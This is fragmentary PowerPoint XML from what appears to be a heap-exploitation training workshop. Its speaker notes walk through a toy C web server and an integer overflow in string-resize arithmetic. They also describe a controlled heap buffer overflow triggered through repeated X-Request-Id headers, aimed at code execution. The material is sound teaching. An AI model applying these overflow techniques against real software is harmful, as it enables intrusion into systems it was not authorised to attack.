            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39321489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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2052199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we can allocate to trigger a REALLY nice overwrite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2826814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Demo…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain going from MAIN to ‘serve’ for the webpage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fork – parent vs. child </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serve_main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functionality overview </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – important data structures: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers, first line, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>routes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global variables such as header and things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defining routes in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Returning data from a route</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go through an example call/setup for the server...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11934853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 Origin and User-Agent all have the same exact functionality. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9753099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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16003484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 Tell them to go to stage2 for EASIER usage of this </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40323809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System &amp; parameter to use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8190020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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2944834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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14817690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Hit the code execution :fire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16138026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Accidental bug that I wrote… and, it’s exploitable </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14684240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Overflow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>numSyms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variable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124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21524197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Create a buffer that is TOO small.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Write the data to this location. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wildcopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – but there IS a way to escape this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NSO took this to arbitrary code execution by creating a weird machine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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293316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Impossible to find bugs in a code base without understanding how it works. Not trying to find bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take some time to understand how these functions works. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trust me, this will be important later. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3083498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Is this even triggerable? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflow would have to send 2GB of data to do…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20421505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Take the current size, the new string size and multiple this by 2. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make an allocation with this new size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the original data into new string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free our old string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflow in the MATH for the new size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23532177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Take the current size, the new string size and multiple this by 2. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make an allocation with this new size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the original data into new string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free our old string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflow in the MATH for the new size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676596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Tiny buffer with a HUGE string will always trigger a crash. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The WRITE here, to put the old data in the new buffer, will use the OLD string size for this. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10225931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Tiny buffer with a HUGE string will always trigger a crash. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The WRITE here, to put the old data in the new buffer, will use the OLD string size for this. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25445845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Controlled size buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14165809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this! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>First ‘X-Request-Id’ as the data being used in the overflow. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The second one triggers the overflow. ﻿0x55555555ebe0</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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332740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Experts become the experts by DOING not thinking about doing. Put yourself out there and try something!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3149996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Today, you have broken through the wall! You’ve ran the 4 minute mile, gotten the first job and now understand the basics of heap exploitation. We’ve tore through the complexity and difficulty by diving into the weeds of the allocator. What’s next for you guys? My advice: understand systems deeply; most of the difficultly/complexity in heap exploitation comes from not fully understanding how the allocator works. The more you understand how something works, the easier it is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Thanks for coming to the workshop today; I had a wonderful time sharing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>this material with you!</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139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4085897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31026" y="4225741"/>
            <a:ext cx="4174064" cy="692072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>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5400000">
            <a:off x="-438566" y="730281"/>
            <a:ext cx="4854769" cy="3977639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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5/5/22</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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4339427" y="-4333462"/>
            <a:ext cx="465152" cy="9144000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="177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Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1820284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5/5/22</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05568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6"/>
            <a:ext cx="1971675" cy="435887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6" y="273846"/>
            <a:ext cx="5800725" cy="43588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5/5/22</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40068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5556837" y="1561380"/>
            <a:ext cx="5148543" cy="2025795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8"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561375" y="1556335"/>
            <a:ext cx="5148547" cy="2025795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="22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5/5/22</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56301" y="4640206"/>
